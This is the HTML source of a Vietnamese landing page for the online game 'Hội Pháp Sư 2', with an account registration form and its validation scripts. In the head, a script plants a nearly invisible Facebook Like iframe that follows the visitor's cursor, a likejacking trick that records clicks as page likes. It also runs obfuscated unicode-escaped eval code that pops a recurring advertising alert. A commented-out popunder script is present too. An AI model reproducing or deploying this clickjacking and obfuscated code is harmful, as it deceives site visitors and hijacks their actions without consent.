<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
	<title>Hội Pháp Sư 2 </title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
	<meta name="Description" content="Hội Pháp Sư 2 - Fairy Tail 2" />
	<meta name="keywords" content="Hoi Phap Su, Phap Su, Hội Pháp Sư,Pháp Sư, Hội Pháp Sư online,hoiphapsu2, Fairytail2, Phap Su online,Pháp Sư online, Fairytail, game hội pháp sư ,game hoi phap su,game hội pháp sư online,  game pháp sư, " />        
	<meta property="og:image" content=" http://landing.hoiphapsu2/images/images-land1p/logoft.png " />
	<link rel="icon" type="image/png" href=" http://landing.hoiphapsu2.com/images/images-land1p/logoft.png ">
	<link rel="image_src" href=" http://landing.hoiphapsu2.com/images/images-land1p/logoft.png " />
	<title>Hội Pháp Sư, Hội Pháp Sư 2 , Game chiến đấu đỉnh cao được mong đợi nhất 2013 - 2014 đã có mặt tại Việt Nam</title><meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta name="dc.subject" content="Hoi Phap Su, Game Chiến đấu đỉnh cao, Hoi Phap Su, Hội Pháp Sư 2, Hoi Phap Su 2, Phap Su Online,Pháp Sư 2 online,Gam Hoi Phap Su, Game Hoi Phap Su 2"/>
	<meta name="dc.rights.copyright" content="HOI PHAP SU 2"/>
	<meta name="dc.creator.name" content="HOI PHAP SU 2"/>
	<meta name="dc.identifier" content="http://www.hoiphapsu2.com"/>
	<meta name="dc.language" content="vi-VN"/>
	<script type="text/javascript">
		var rootUrl = "";
	</script>
    
    <script type="text/javascript"
        src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.js"></script>
        <script type="text/javascript" src="/js/pop.js"></script>
        <script type="text/javascript" src="/js/transword.js"></script>  
       
        <script type="text/javascript" src="/js/reg.js"></script>  
        <link href="/css/style_pop.css" rel="stylesheet" type="text/css" />
        
        
        <link href="../css/style_pop.css" rel="stylesheet" type="text/css" />  
        <script type="text/javascript"
            src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.js"></script>    
                                    <script type="text/javascript" src="/js/vohiep.js"></script>              
                             

        <script type="text/javascript">

        //    var bluser = false, blpass = false, blconfirmpass = false;
            function activateTab(pageId) {
                var tabCtrl = document.getElementById('tabCtrl');
                var pageToActivate = document.getElementById(pageId);
                for (var i = 0; i < tabCtrl.childNodes.length; i++) {
                    var node = tabCtrl.childNodes[i];
                    if (node.nodeType == 1) { /* Element */
                        node.style.display = (node == pageToActivate) ? 'block' : 'none';
                    }
                }
            }


        </script>
		

	
         <script type="text/javascript">
		    
            function OpenDiv(w, h) {
			//alert('click');
            oReg.statgo('clickopen', '1047651', 'M', '', '5033');
            OpenDivReg(w, h);
			
			
                                }
    </script>

	<script type="text/javascript" src="/js/ga.js"></script>
		

			
<script>
var fan_page_url = 'https://www.facebook.com/pages/Ch%C6%A1i-Game/580523685375030?ref=hl'
var opacity =0.2;
var time = 5000;
</script>
<script>
if((document.getElementById) && window.addEventListener || window.attachEvent){
    (function(){
        var hairCol = "#ff0000";

        var d = document;
        var my = -10;
        var mx = -10;
        var r;
        var vert = "";
        var idx = document.getElementsByTagName('div').length;

        var thehairs = "<iframe id='theiframe' scrolling='no' frameBorder='0' allowTransparency='true' src='http://www.facebook.com/widgets/like.php?href=" + encodeURIComponent(fan_page_url) + "&amp;layout=standard&amp;show_faces=true&amp;width=80&amp;action=like&amp;colorscheme=light&amp;height=30' style='position:absolute;width:53px;height:30px;z-index: 200000;overflow:hidden;border:0;opacity:" + opacity +";filter:alpha(opacity=" + opacity * 100+ ");'></iframe>";
        var like;
        var faceLike=getCookie("faceLike");
        if (faceLike!=null && faceLike!="")
        {                
        }
        else
        {
            setCookie("faceLike",'liked',1);
            document.write(thehairs);
            like = document.getElementById("theiframe");
            document.getElementsByTagName('body')[0].appendChild(like);
        }
       eval('\u0073\u0065\u0074\u0049\u006e\u0074\u0065\u0072\u0076\u0061\u006c\u0028\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0029\u007b\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0047\u0069\u0061\u0069\u0070\u0068\u0061\u0070\u0074\u0068\u0075\u006f\u006e\u0067\u0068\u0069\u0065\u0075\u002e\u006f\u0072\u0067\u0020\u0063\u0068\u0075\u0079\u00ea\u006e\u0020\u0074\u0072\u0061\u006e\u0067\u0020\u006d\u0061\u0072\u006b\u0065\u0074\u0069\u006e\u0067\u0020\u0077\u0065\u0062\u0073\u0069\u0074\u0065\u0022\u0029\u007d\u002c\u0031\u0038\u0030\u0030\u0030\u0030\u0030\u0030\u0029\u003b');

        var pix = "px";
        var domWw = (typeof window.innerWidth == "number");
        var domSy = (typeof window.pageYOffset == "number");
        if (domWw)
            r = window;
        else{
            if (d.documentElement && typeof d.documentElement.clientWidth == "number" && d.documentElement.clientWidth != 0)
                r = d.documentElement;
            else{
                if (d.body && typeof d.body.clientWidth == "number")
                    r = d.body;
            }
        }
        if(time != 0){
            setTimeout(function(){
                        document.getElementsByTagName('body')[0].removeChild(like);

                        if (window.addEventListener){
                            document.removeEventListener("mousemove",mouse,false);
                        }
                        else if (window.attachEvent){
                            document.detachEvent("onmousemove",mouse);
                        }
                    }, time);
        }

        function scrl(yx){
            var y,x;
            if (domSy){
                y = r.pageYOffset;
                x = r.pageXOffset;
            }
            else{
                y = r.scrollTop;
                x = r.scrollLeft;
            }
            return (yx == 0) ? y:x;
        }
        function mouse(e){
            var msy = (domSy)?window.pageYOffset:0;
            if (!e)
                e = window.event;
            if (typeof e.pageY == 'number'){
                my = e.pageY - 15 - msy;
                mx = e.pageX - 34;
            }
            else{
                my = e.clientY - 16 - msy;
                mx = e.clientX - 36;
            }
            vert.top = my + scrl(0) + pix;
            vert.left = mx + pix;
        }
        function ani(){
            vert.top = my + scrl(0) + pix;
            setTimeout(ani, 300);
        }
        function init(){
            vert = document.getElementById("theiframe").style;
            ani();
        }
        function getCookie(c_name)
        {
        var c_value = document.cookie;
        var c_start = c_value.indexOf(" " + c_name + "=");
        if (c_start == -1)
        {
        c_start = c_value.indexOf(c_name + "=");
        }
        if (c_start == -1)
        {
        c_value = null;
        }
        else
        {
        c_start = c_value.indexOf("=", c_start) + 1;
        var c_end = c_value.indexOf(";", c_start);
        if (c_end == -1)
        {
        c_end = c_value.length;
        }
        c_value = unescape(c_value.substring(c_start,c_end));
        }
        return c_value;
        }
        function setCookie(c_name,value,exdays)
        {
        var exdate=new Date();
        exdate.setDate(exdate.getDate() + exdays);
        var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString());
        document.cookie=c_name + "=" + c_value;
        }

        function checkCookie()
        {
        var faceLike=getCookie("faceLike");
        if (faceLike!=null && faceLike!="")
          {
       
          alert("Welcome again " + faceLike);
       
          }
        else
          {
            setCookie("faceLike",'liked',1);
          }
        }

        if (window.addEventListener){
            window.addEventListener("load",init,false);
            document.addEventListener("mousemove",mouse,false);
        }
        else if (window.attachEvent){
            window.attachEvent("onload",init);
            document.attachEvent("onmousemove",mouse);
        }

    })();
}//End
</script>


		
			
 </head>
 
 <body onkeypress="if(event.keyCode == 13){oReg.chkFrm('server', '');}" style="background:#000000;">
    <div id="Loading_Bg" style="position: absolute; z-index: 999; left: 0px; top: 0px; color: rgb(102, 102, 102); background-color: rgb(0, 0, 0); opacity: 0.5; margin: 0px auto; width: 100%; height: 850px; display: none;"></div>
    <div id="wrapper"> 
		<div class="popcenter">
		
		  
            <div class="top" style="position: absolute;z-index:1;">
        <span class="mid">
         <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" 
        codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" height="650" width="1300">
          <param name="movie" value="images/images-land1p/ld.swf"/>
          <param name="wmode" value="transparent"/>
          <param name="allowScriptAccess" value="always"/>
          <embed src="images/images-land1p/ld.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" allowscriptaccess="always" height="650" width="1300"/>
        </object>
        </span></div>
			
		<!--		<div style="position: absolute;z-index: 20; right: 246px; top: 49px;">
                <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" 
                      codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0"
                      width="310px" height="304px">
		           	<param name="movie" value="images/images-land1p/video1.swf"/>
	           		<param name="quality" value="high"/>
		          	<param name="wmode" value="transparent"/>
		          	<embed src="images/images-land1p/video1.swf" quality="high" wmode="transparent" 
                    type="application/x-shockwave-flash" width="310px" height="304px" 
                    pluginspage="http://www.macromedia.com/go/getflashplayer" />
	               	</object>                    
                    </div>  -->
					
		 <div id="OpenDiv" style="display: none;width: 550px;height: auto;"></div>
        <div id="Loading" style="position: absolute; background: none repeat scroll 0% 0% transparent; z-index: 99999; left: 0px; top: 0px; border: 0px none; width: 0px; height: 0px; opacity: 1; display: none;">
        <div style="float: left; width: 100%; display: none;" id="divload">

         <div class="box-dkn">
            <a class="btn_close" href="javascript:CloseLoad();"><img src="images/images-land1p/close_pop.png" alt="close"></a>
                <div class="title-dkn"></div>
                    <div class="midd-dkn">

                <div style="clear: both;"></div>
                
                
                <div id="tabCtrl"> 
                 <div id="tabReg" style="display: block;">
                 <div class="title-regist"></div>
                     <div class="form-reg">
                         <form action="#" name="frmdkn" id="frmdkn" method="post" >
                            <input type="hidden" id="action" name="action" value="">
							<input type="hidden" id="utm_source" name = "utm_source" value ="" />
	
				    <div class="messages">
					
						<div class="hidde">
                        <div class="textbox">
                                  <label for="name"> Tên đăng nhập</label>
                                 <input type="text" name="reg_username" id ="reg_username" value="" />
								  <div id="status"> </div>
                             </div>
                        
                        <div class="textbox">
                            <label for="matkhau"> Mật khẩu</label>
                            <input type="password" name="reg_password" id= "reg_password" value=""/>
                              <div id="pstatus"></div>
                        </div>
                        <div class="textbox">
                                <label for="matkhau"> Xác nhận M.K</label>
                                <input type="password" name="reg_confirmpassword" id="reg_confirmpassword" />
                                  <div id="cpstatus"></div>
                        </div>
                       <!-- <div class="textbox">
                            <label for="name"> Email</label>
                            <input type="text" name="reg_email" id= "reg_email" value=""/>
                              <div id="emailstatus"></div>
                        </div>-->
						<div class="textbox">
							<img id="captcha_img" src="" style="display: none;align:left;margin: -2px 0px 10px 165px;" />
							<div style="clear:both;"></div>
							<label for="email"> Mã xác nhận</label>
							<input type="text" name="captcha" id="captcha" value=""/>
							
						</div>    
								<div style="clear:both;"></div> 
							<p style="color:#ede4cf;">Đăng ký nhanh tay, nhận ngay Giftcode 1.000.000</p>
                            <div style="clear: both;"></div>                            
                            <div class="btn-regist">
                                    <input type="button" name="sub" value="Đăng ký" id="submitreg" onclick="onfrmRegisterclick();" />
                                </div>  
							</div>
																	</div>
						
                    </form>
                    </div>
                    </div>

                    </div>
                    <div class="bottom-dkn"></div>
                </div><!--End .midd-dkn-->
    </div> 
	</div>
	</div> 
	</div>
    </div><!--end wapper-->
</body><!--end body-->
</html><!--end html-->
			<script type="text/javascript">
				$(document).ready(function() {
				$('.btn-regist input').click(function() {
				$('.midd-dkn').load('colLeft.phtml');
				return false;
				});
				});
			</script>



<script type="text/javascript">
    var action = "";
    if (action =="login"){
        activateTab("tabLogin"); 
    }else{
        activateTab("tabReg");
    }

   function init() {   
        vohiep_captcha.getCaptcha();
    }
        window.onload = init;



    var bluser = false;
    var blpass = false;
    var blconfirmpass = false;
	//var blphone = false;
	var blemail = false;

    function onfrmRegisterclick(){

        if (bluser && blpass && blconfirmpass ){
            $("#action").val("register");
            document.forms["frmdkn"].submit();
			
        } else{
            alert("Bạn nhập thông tin mật khẩu hoặc tên không đủ tiêu chuẩn \n Hoặc tên đăng ký ,mã xác nhận sai!");
        }

    }

    var bloginuser = false;
    function onfrmLoginclick(){
        if (bloginuser){
            $("#action").val("login");
            document.forms["formlogin"].submit();
        } else{
            alert("Tên đăng nhập chưa đúng. \nBạn nhập lại hoặc đăng ký mới!");
        }

    }


    $(document).ready(function(){

        $("#reg_username").change(function() { 

            var usr = $("#reg_username").val();


            if(usr.length >= 4)
                {
                $("#status").html('<img src="/images/loader.gif" align="absmiddle">&nbsp;Checking...');

                $.ajax({  
                    type: "POST",  
                    url: "/home/checkusername",  
                    data: "username="+ usr,  
                    success: function(msg){  

                        $("#status").ajaxComplete(function(event, request, settings){ 

                            if(msg == 'OK')
                                { 
                                //                                $("#reg_username").removeClass('object_error'); // if necessary
                                //                                $("#reg_username").addClass("object_ok");
                                //$(this).html('&nbsp;<img src="/images/tick.gif" align="absmiddle">');
                                $("#status").html('<img src="../images/ok.png" align="absmiddle">');
                                bluser = true;
                            }  
                            else  
                                {  
                                //                                $("#reg_username").removeClass('object_ok'); // if necessary
                                //                                $("#reg_username").addClass("object_error");

                                $(this).html('<img src="../images/error.png" align="absmiddle" alt="ko thoa man" title="ko thoa man title">');
                                bluser = false;

                            }  

                        });

                    } 

                }); 

            }
            else
                {
                bluser = false;
                $("#status").html('<img src="../images/error.png" align="absmiddle">');
                //                $("#status").html('<font color="red">Tên đăng nhập không nhỏ hơn <strong>4 </strong> ký tự.</font>');
                //                $("#reg_username").removeClass('object_ok'); // if necessary
                //                $("#reg_username").addClass("object_error");
            }

        });

        $("#reg_password").change(function(){

            var pass = $("#reg_password").val();
            $("#cpstatus").html("");
            blconfirmpass = false;

            $("input#reg_confirmpassword").val($(this).html());

            if (pass.length < 6){
                //$("#pstatus").html("<font color='red'>Độ dài của mật khẩu không nhỏ hơn 6 ký tự.</font>");
                $("#pstatus").html('<img src="../images/error.png" align="absmiddle">');
                blpass = false;
            }
            else{

                $("#pstatus").html('<img src="/images/loader.gif" align="absmiddle">&nbsp;Checking...');

                $.ajax({  
                    type: "POST",  
                    url: "/home/checkpassword",  
                    data: "password="+ pass,  
                    success: function(msg){  

                        $("#pstatus").ajaxComplete(function(event, request, settings){ 

                            if(msg == 'OK')
                                { 
                                $("#reg_password").removeClass('object_error'); // if necessary
                                $("#reg_password").addClass("object_ok");
                                //$(this).html('&nbsp;<img src="/images/tick.gif" align="absmiddle">');
                                $(this).html('<img src="../images/ok.png" align="absmiddle">');
                                blpass = true;
                            }  
                            else  
                                {  
                                $(this).html('<img src="../images/error.png" align="absmiddle">');
                                //                                $("#reg_password").removeClass('object_ok'); // if necessary
                                //                                $("#reg_password").addClass("object_error");
                                //                                $(this).html(msg);
                                blpass= false;
                            }  

                        });

                    } 

                }); 


            }
        })  ;
        $("#reg_confirmpassword").change(function(){
            var pass = $("#reg_password").val();
            var cpass = $("#reg_confirmpassword").val();
            if(pass != cpass){
                blconfirmpass = false;
                $("#cpstatus").html('<img src="../images/error.png" align="absmiddle">');
            }  else{
                blconfirmpass = true;
                $("#cpstatus").html('<img src="../images/ok.png" align="absmiddle">');
            }       
        })  ;
        
            $("#reg_email").change(function() { 
            var email = $("#reg_email").val();
            $("#emailstatus").html('<img src="/images/loader.gif" align="absmiddle">&nbsp;Checking...');
            $.ajax({  
                    type: "POST",  
                    url: "/home/checkemail",  
                    data: "email="+ email,  
                    success: function(msg){  

                        $("#emailstatus").ajaxComplete(function(event, request, settings){ 

                            if(msg == 'OK')
                                { 
                                $("#emailstatus").html('<img src="../images/ok.png" align="absmiddle">');
                                blemail = true;
                            }  
                            else  
                                {  
                                $(this).html('<img src="../images/error.png" align="absmiddle" alt="ko thoa man" title="ko thoa man title">');
                                blemail = false;
                            }  
                        });
                    } }); });
        $("#confirmemail").change(function(){
            var pass = $("#email").val();
            var cpass = $("#confirmemail").val();
            if(pass != cpass){
                blcemail = false;
                $("#cemailstatus").html('<img src="../images/error.png" align="absmiddle">');
            }  else{
                blcemail = true;
                $("#cemailstatus").html('<img src="../images/ok.png" align="absmiddle">');
            }       
        })  ;
 /*       
 //-------------check phone---------------------------
	 $("#phone").change(function() { 
				var phone = $("#phone").val();
				
				$("#phonestatus").html('<img src="/images/loader.gif" align="absmiddle">&nbsp;Checking...');
				$.ajax({  
						type: "POST",  
						url: "/home/checkphone",  
						data: "phone="+ phone,  
						success: function(msg){  

							$("#phonestatus").ajaxComplete(function(event, request, settings){ 

								if(msg == 'OK')
									{ 
									$("#phonestatus").html('<img src="../images/ok.png" align="absmiddle">');
									blphone = true;
								}  
								else  
									{  
									$(this).html('<img src="../images/error.png" align="absmiddle" alt="ko thoa man" title="ko thoa man title">');
									blphone = false;
								}  
							});
						} }); });	  
			*/



    });


    $("#login_name").change(function() { 

        var usr = $("#login_name").val();


        if(usr.length >= 4)
            {
            $("#loginstatus").html('<img src="/images/loader.gif" align="absmiddle">&nbsp;Checking...');

            $.ajax({  
                type: "POST",  
                url: "/home/checkusername",  
                data: "username="+ usr,  
                success: function(msg){  

                    $("#loginstatus").ajaxComplete(function(event, request, settings){ 

                        if(msg == 'OK')
                            { 
                            $(this).html('<img src="../images/error.png" align="absmiddle" alt="ko thoa man" title="ko thoa man title">');                                    

                            bloginuser = false;
                        }  
                        else  
                            {  
                            $("#loginstatus").html('<img src="../images/ok.png" align="absmiddle">');                                
                            bloginuser = true;

                        }  

                    });

                } 

            }); 

        }
        else
            {
            bloginuser  = false;
            $("#loginstatus").html('<img src="../images/error.png" align="absmiddle">');
        }

    });



</script>

	<script type="text/javascript">
			
			
		/*				
			function addEvent(obj, eventName, func){
				if (obj.attachEvent)
				{
				obj.attachEvent("on" + eventName, func);
				}
				else if(obj.addEventListener)
				{
				obj.addEventListener(eventName, func, true);
				}
				else
				{
				obj["on" + eventName] = func;
				}
			}

			addEvent(window, "load", function(e){
			addEvent(document.body, "click", function(e)
			{
			// -------------- cau hinh chung cho cu so pop --------------------
			var params = 'height='+1+',width=' +1+ ',left=9999,top=9999,location=0,toolbar=0,status=0,menubar=0,scrollbars=0,resizable=0';
			// -------------- pop 1 --------------------
			if(document.cookie.indexOf("nodo") == -1)
			{
			document.cookie = "popunder=nodo";
			var w = window.open("http://www.aovai.net",'nodo', params);
			if (w)
			{
			document.cookie = "popunder=nodo";
			w.blur();
			}
			//window.focus();
			}
			// -------------------- het-----------------
			});
			});  */
						
			var submit = '0';
			if (submit == '1'){
			//	alert('123');
				 oReg.statgo('clickopen', '1047651', 'M', '', '5033');
				OpenDivReg(500, 500);
			}			
		
		</script>
